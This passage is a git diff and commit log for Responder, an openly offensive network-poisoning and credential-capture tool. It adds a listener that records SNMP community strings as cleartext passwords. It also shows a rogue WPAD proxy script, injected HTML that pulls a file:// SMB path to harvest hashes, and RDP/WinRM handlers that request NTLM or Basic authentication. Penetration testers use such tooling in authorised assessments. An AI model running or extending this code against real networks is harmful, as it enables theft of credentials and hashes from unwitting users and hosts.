+			#Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject) #While at it, grab some SMB hashes...
+			#Buffer.calculate()
+			#Return a TCP RST, so the client uses direct connection and avoids disruption.
+			return RST
 		else:
               		return IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)# Didn't work? no worry, let's grab hashes via SMB...

@@ -93,7 +94,7 @@ def PacketSequence(data, client, Challenge):
 		if settings.Config.Basic:
 			Response = WPAD_Basic_407_Ans()
 			if settings.Config.Verbose:
-				print(text("[Proxy-Auth] Sending BASIC authentication request to %s" % client))
+				print(text("[Proxy-Auth] Sending BASIC authentication request to %s" % client.replace("::ffff:","")))

 		else:
 			Response = WPAD_Auth_407_Ans()
--- a/servers/RDP.py
+++ b/servers/RDP.py
@@ -98,6 +98,11 @@ class RDP(BaseRequestHandler):
 			self.request.settimeout(30)
 			Challenge = RandomChallenge()

+			cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
+			key =  os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
+			context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
+			context.load_cert_chain(cert, key)
+
 			if data[11:12] == b'\x01':
 				x =  X224(Data=RDPNEGOAnswer())
 				x.calculate()
@@ -105,7 +110,7 @@ class RDP(BaseRequestHandler):
 				h.calculate()
 				buffer1 = str(h)
 				self.request.send(NetworkSendBufferPython2or3(buffer1))
-				SSLsock = ssl.wrap_socket(self.request, certfile=cert, keyfile=key, ssl_version=ssl.PROTOCOL_TLS_SERVER,server_side=True)
+				SSLsock = context.wrap_socket(self.request, server_side=True)
 				SSLsock.settimeout(30)
 				data = SSLsock.read(8092)
 				if FindNTLMNegoStep(data) == b'\x01\x00\x00\x00':
@@ -125,8 +130,7 @@ class RDP(BaseRequestHandler):
 				buffer1 = str(h)
 				self.request.send(NetworkSendBufferPython2or3(buffer1))
 				data = self.request.recv(8092)
-
-				SSLsock = ssl.wrap_socket(self.request, certfile=cert, keyfile=key, ssl_version=ssl.PROTOCOL_TLS,server_side=True)
+				SSLsock = context.wrap_socket(self.request, server_side=True)
 				data = SSLsock.read(8092)
 				if FindNTLMNegoStep(data) == b'\x01\x00\x00\x00':
 					x = RDPNTLMChallengeAnswer(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
--- a/servers/RPC.py
+++ b/servers/RPC.py
@@ -144,7 +144,7 @@ class RPCMap(BaseRequestHandler):
 					RPC.calculate()
 					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
 					data = self.request.recv(1024)
-					print(color("[*] [DCE-RPC Mapper] Redirected %-15sto DSRUAPI auth server." % (self.client_address[0]), 3, 1))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15sto DSRUAPI auth server." % (self.client_address[0].replace("::ffff:","")), 3, 1))
 					self.request.close()

 				#LSARPC
@@ -155,7 +155,7 @@ class RPCMap(BaseRequestHandler):
 					RPC.calculate()
 					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
 					data = self.request.recv(1024)
-					print(color("[*] [DCE-RPC Mapper] Redirected %-15sto LSARPC auth server." % (self.client_address[0]), 3, 1))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15sto LSARPC auth server." % (self.client_address[0].replace("::ffff:","")), 3, 1))
 					self.request.close()

 				#WINSPOOL
@@ -166,7 +166,7 @@ class RPCMap(BaseRequestHandler):
 					RPC.calculate()
 					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
 					data = self.request.recv(1024)
-					print(color("[*] [DCE-RPC Mapper] Redirected %-15sto WINSPOOL auth server." % (self.client_address[0]), 3, 1))
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15sto WINSPOOL auth server." % (self.client_address[0].replace("::ffff:","")), 3, 1))
 					self.request.close()

 				#NetLogon
--- a/servers/SMB.py
+++ b/servers/SMB.py
@@ -206,7 +206,6 @@ class SMB1(BaseRequestHandler):  # SMB1 & SMB2 Server class, NTLMSSP
 						self.request.send(Buffer)
 						data = self.request.recv(1024)
 					except:
-						raise
 						pass

                                ##Negotiate proto answer SMBv2.
--- a/servers/SNMP.py
+++ b/servers/SNMP.py
@@ -0,0 +1,50 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+from utils import *
+
+if settings.Config.PY2OR3 == "PY3":
+    from socketserver import BaseRequestHandler
+else:
+    from SocketServer import BaseRequestHandler
+
+from pyasn1.codec.der.decoder import decode
+
+
+class SNMP(BaseRequestHandler):
+    def handle(self):
+        data = self.request[0]
+        received_record, rest_of_substrate = decode(data)
+
+        snmp_version = int(received_record['field-0'])
+
+        if snmp_version > 1:
+            # TODO: Add support for SNMPv3 (which will have a field-0 value of 2)
+            print(text("[SNMP] Unsupported SNMPv3 request received from %s" % self.client_address[0].replace("::ffff:","")))
+            return
+
+        community_string = str(received_record['field-1'])
+
+        SaveToDb(
+            {
+                "module": "SNMP",
+                "type": "Cleartext",
+                "client": self.client_address[0],
+                "user": community_string,
+                "cleartext": community_string,
+                "fullhash": community_string,
+            }
+        )
--- a/servers/WinRM.py
+++ b/servers/WinRM.py
@@ -127,12 +127,12 @@ def PacketSequence(data, client, Challenge):
 		if settings.Config.Basic:
 			Response = IIS_Basic_401_Ans()
 			if settings.Config.Verbose:
-				print(text("[WinRM] Sending BASIC authentication request to %s" % client))
+				print(text("[WinRM] Sending BASIC authentication request to %s" % client.replace("::ffff:","")))

 		else:
 			Response = IIS_Auth_401_Ans()
 			if settings.Config.Verbose:
-				print(text("[WinRM] Sending NTLM authentication request to %s" % client))
+				print(text("[WinRM] Sending NTLM authentication request to %s" % client.replace("::ffff:","")))

 		return Response

--- a/settings.py
+++ b/settings.py
@@ -23,7 +23,7 @@ import subprocess

 from utils import *

-__version__ = 'Responder 3.1.1.0'
+__version__ = 'Responder 3.1.3.0'

 class Settings:
 	
@@ -96,9 +96,10 @@ class Settings:
 		self.LDAP_On_Off     = self.toBool(config.get('Responder Core', 'LDAP'))
 		self.DNS_On_Off      = self.toBool(config.get('Responder Core', 'DNS'))
 		self.RDP_On_Off      = self.toBool(config.get('Responder Core', 'RDP'))
-		self.DCERPC_On_Off      = self.toBool(config.get('Responder Core', 'DCERPC'))
-		self.WinRM_On_Off      = self.toBool(config.get('Responder Core', 'WINRM'))
+		self.DCERPC_On_Off   = self.toBool(config.get('Responder Core', 'DCERPC'))
+		self.WinRM_On_Off    = self.toBool(config.get('Responder Core', 'WINRM'))
 		self.Krb_On_Off      = self.toBool(config.get('Responder Core', 'Kerberos'))
+		self.SNMP_On_Off     = self.toBool(config.get('Responder Core', 'SNMP'))

 		# Db File
 		self.DatabaseFile    = os.path.join(self.ResponderPATH, config.get('Responder Core', 'Database'))
@@ -133,9 +134,10 @@ class Settings:
 		self.Bind_To6           = utils.FindLocalIP6(self.Interface, self.OURIP)
 		self.DHCP_DNS           = options.DHCP_DNS
 		self.ExternalIP6        = options.ExternalIP6
+		self.Quiet_Mode			= options.Quiet

 		if self.Interface == "ALL":
-                	self.Bind_To_ALL  = True
+			self.Bind_To_ALL  = True
 		else:
 			self.Bind_To_ALL  = False
 		#IPV4
@@ -177,6 +179,7 @@ class Settings:
 		self.SMBClearLog     = os.path.join(self.LogDir, 'SMB-Clear-Text-Password-%s.txt')
 		self.SMTPClearLog    = os.path.join(self.LogDir, 'SMTP-Clear-Text-Password-%s.txt')
 		self.MSSQLClearLog   = os.path.join(self.LogDir, 'MSSQL-Clear-Text-Password-%s.txt')
+		self.SNMPLog         = os.path.join(self.LogDir, 'SNMP-Clear-Text-Password-%s.txt')

 		self.LDAPNTLMv1Log   = os.path.join(self.LogDir, 'LDAP-NTLMv1-Client-%s.txt')
 		self.HTTPNTLMv1Log   = os.path.join(self.LogDir, 'HTTP-NTLMv1-Client-%s.txt')
@@ -203,7 +206,7 @@ class Settings:
 			self.HtmlToInject = "<img src='file://///"+self.Bind_To+"/pictures/logo.jpg' alt='Loading' height='1' width='1'>"

 		if len(self.WPAD_Script) == 0:
-			self.WPAD_Script = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(*.ProxySrv|ProxySrv)")) return "DIRECT"; return "PROXY '+self.Bind_To+':3128; PROXY '+self.Bind_To+':3141; DIRECT";}'
+			self.WPAD_Script = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; return "PROXY '+self.Bind_To+':3128; PROXY '+self.Bind_To+':3141; DIRECT";}'

 		if self.Serve_Exe == True:	
 			if not os.path.exists(self.Html_Filename):
@@ -220,8 +223,10 @@ class Settings:
 		self.RespondTo         = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')]))
 		self.RespondToName     = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondToName').strip().split(',')]))
 		self.DontRespondTo     = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')]))
-		self.DontRespondToName = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')]))
-
+		self.DontRespondToName_= list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')]))
+		#add a .local to all provided DontRespondToName
+		self.MDNSTLD           = ['.LOCAL']
+		self.DontRespondToName = [x+y for x in self.DontRespondToName_ for y in ['']+self.MDNSTLD]
 		#Generate Random stuff for one Responder session
 		self.MachineName       = 'WIN-'+''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(11)])
 		self.Username            = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])
--- a/tools/odict.py
+++ b/tools/odict.py
@@ -3,7 +3,10 @@ try:
    from UserDict import DictMixin
 except ImportError:
    from collections import UserDict
-    from collections import MutableMapping as DictMixin
+    try:
+        from collections import MutableMapping as DictMixin
+    except ImportError:
+        from collections.abc import MutableMapping as DictMixin

 class OrderedDict(dict, DictMixin):

--- a/utils.py
+++ b/utils.py
@@ -317,7 +317,7 @@ def SaveToDb(result):
 	for k in [ 'module', 'type', 'client', 'hostname', 'user', 'cleartext', 'hash', 'fullhash' ]:
 		if not k in result:
 			result[k] = ''
-
+	result['client'] = result['client'].replace("::ffff:","")
 	if len(result['user']) < 2:
 		print(color('[*] Skipping one character username: %s' % result['user'], 3, 1))
 		text("[*] Skipping one character username: %s" % result['user'])
@@ -337,16 +337,10 @@ def SaveToDb(result):
 	logfile = os.path.join(settings.Config.ResponderPATH, 'logs', fname)

 	if not count:
-		with open(logfile,"a") as outf:
-			if len(result['cleartext']):  # If we obtained cleartext credentials, write them to file
-				outf.write('%s:%s\n' % (result['user'].encode('utf8', 'replace'), result['cleartext'].encode('utf8', 'replace')))
-			else:  # Otherwise, write JtR-style hash string to file
-				outf.write(result['fullhash'] + '\n')#.encode('utf8', 'replace') + '\n')
-
 		cursor.execute("INSERT INTO responder VALUES(datetime('now'), ?, ?, ?, ?, ?, ?, ?, ?)", (result['module'], result['type'], result['client'], result['hostname'], result['user'], result['cleartext'], result['hash'], result['fullhash']))
 		cursor.commit()

-	if settings.Config.CaptureMultipleHashFromSameHost:
+	if not count or settings.Config.CaptureMultipleHashFromSameHost:
 		with open(logfile,"a") as outf:
 			if len(result['cleartext']):  # If we obtained cleartext credentials, write them to file
 				outf.write('%s:%s\n' % (result['user'].encode('utf8', 'replace'), result['cleartext'].encode('utf8', 'replace')))
@@ -393,7 +387,7 @@ def SavePoisonersToDb(result):
 	for k in [ 'Poisoner', 'SentToIp', 'ForName', 'AnalyzeMode' ]:
 		if not k in result:
 			result[k] = ''
-
+	result['SentToIp'] = result['SentToIp'].replace("::ffff:","")
 	cursor = sqlite3.connect(settings.Config.DatabaseFile)
 	cursor.text_factory = sqlite3.Binary  # We add a text factory to support different charsets
 	res = cursor.execute("SELECT COUNT(*) AS count FROM Poisoned WHERE Poisoner=? AND SentToIp=? AND ForName=? AND AnalyzeMode=?", (result['Poisoner'], result['SentToIp'], result['ForName'], result['AnalyzeMode']))
@@ -476,6 +470,10 @@ def banner():
 	print(banner)
 	print("\n           \033[1;33mNBT-NS, LLMNR & MDNS %s\033[0m" % settings.__version__)
 	print('')
+	print("  To support this project:")
+	print("  Patreon -> https://www.patreon.com/PythonResponder")
+	print("  Paypal  -> https://paypal.me/PythonResponder")
+	print('')
 	print("  Author: Laurent Gaffie (laurent.gaffie@gmail.com)")
 	print("  To kill this script hit CTRL-C")
 	print('')
@@ -511,6 +509,7 @@ def StartupMessage():
 	print('    %-27s' % "RDP server" + (enabled if settings.Config.RDP_On_Off else disabled))
 	print('    %-27s' % "DCE-RPC server" + (enabled if settings.Config.DCERPC_On_Off else disabled))
 	print('    %-27s' % "WinRM server" + (enabled if settings.Config.WinRM_On_Off else disabled))
+	print('    %-27s' % "SNMP server" + (enabled if settings.Config.SNMP_On_Off else disabled))
 	print('')

 	print(color("[+] ", 2, 1) + "HTTP Options:")
Author	SHA1	Message	Date
lgandx	f39079da77	Revert "run smbv1 scan in runfinger"	2022-11-08 09:22:41 -03:00
lgandx	8d25d04f13	Merge pull request #218 from ss23/snmp Implement a basic SNMP listener	2022-11-07 11:18:02 -03:00
Stephen Shkardoon	9d4f919b39	Implement a basic SNMP listener All community strings are logged as they are sent to the server. This initial implementation only supports SNMPv1 and SNMPv2c. `pyasn1` is required for this server to function.	2022-11-06 01:27:28 +13:00
lgandx	59daf46b93	Merge pull request #216 from requin-citron/smbv1ScanWorkAgain run smbv1 scan in runfinger	2022-11-03 15:44:05 -03:00
requin	cf0c4ee659	add flag (-s) to enable smbv1scan	2022-11-02 19:16:10 +01:00
requin	709df2c6e1	add hostname on smbv2 scan result	2022-10-31 17:31:16 +01:00
Sans23	3aaaaf1c7f	Merge branch 'lgandx:master' into smbv1ScanWorkAgain	2022-10-31 15:16:24 +01:00
lgandx	c9b5dd040e	Removed machine accounts dump, since they are not crackable	2022-10-19 08:44:05 -03:00
klemou	4321919c9f	run smbv1 scan in runfinger	2022-10-01 09:26:32 +02:00
lgandx	b8818ed0c4	Added dump by legacy protocols	2022-09-16 09:36:51 -03:00
lgandx	07dbcf5d6d	Modified wpad script	2022-08-06 02:49:28 -03:00
lgandx	c51251db5f	Fixed potential disruption on Proxy-Auth	2022-08-06 00:26:11 -03:00
lgandx	fe58475c63	Merge pull request #210 from 0xjbb/master Added Quiet Mode	2022-08-05 22:06:19 -03:00
lgandx	00d9d27089	added requirements.txt	2022-08-05 21:49:48 -03:00
lgandx	56c3832a3c	Create FUNDING.yml	2022-08-05 21:21:53 -03:00
lgandx	0bc226b4be	Added: append .local TLD to DontRespondToNames + MDNS bug fix	2022-08-05 20:27:56 -03:00
lgandx	fad2be0a8e	Merge pull request #199 from gblomqvist/master Fix double logging of first hash/cleartext when CaptureMultipleHashFromSameHost = On	2022-08-05 18:58:56 -03:00
lgandx	2765ef4e66	fixed the RespondTo/DontRespondTo issue	2022-08-05 18:51:57 -03:00
jb	2cd66a9b92	Added Quiet mode	2022-07-29 21:15:40 +01:00
lgandx	15d03bc902	Minor bugs and display/logging fixes + RDP srv SSLwrapping fix	2022-07-26 14:56:18 -03:00
lgandx	9b1c99ccd2	Fixed: Warnings on python 3.10	2022-07-12 20:15:36 -03:00
lgandx	983a1c6576	removed -r reference from help msg.	2022-05-17 21:48:02 -03:00
lgandx	03fa9a7187	removed -r references	2022-05-17 21:38:01 -03:00
lgandx	a6838fdc42	Merge pull request #202 from noraj/patch-2 odict: fix import issue	2022-05-17 21:16:41 -03:00
lgandx	8c201cf33e	Merge pull request #203 from cweedon/patch-1 Fix missing paren error	2022-05-17 21:15:41 -03:00
cweedon	0c7a3ffabe	Fix missing paren error added parentheses to the print call to fix the error	2022-05-17 12:20:28 -05:00
Alexandre ZANNI	d1cb26bda7	keep compatibility with previous versions	2022-05-13 18:06:35 +02:00
Alexandre ZANNI	0ced7d52c0	odict: fix import issue	2022-05-08 20:54:23 +02:00
Gustaf Blomqvist	e7eb3bcce8	Fix double logging of first hash or cleartext	2022-04-28 15:20:13 +02:00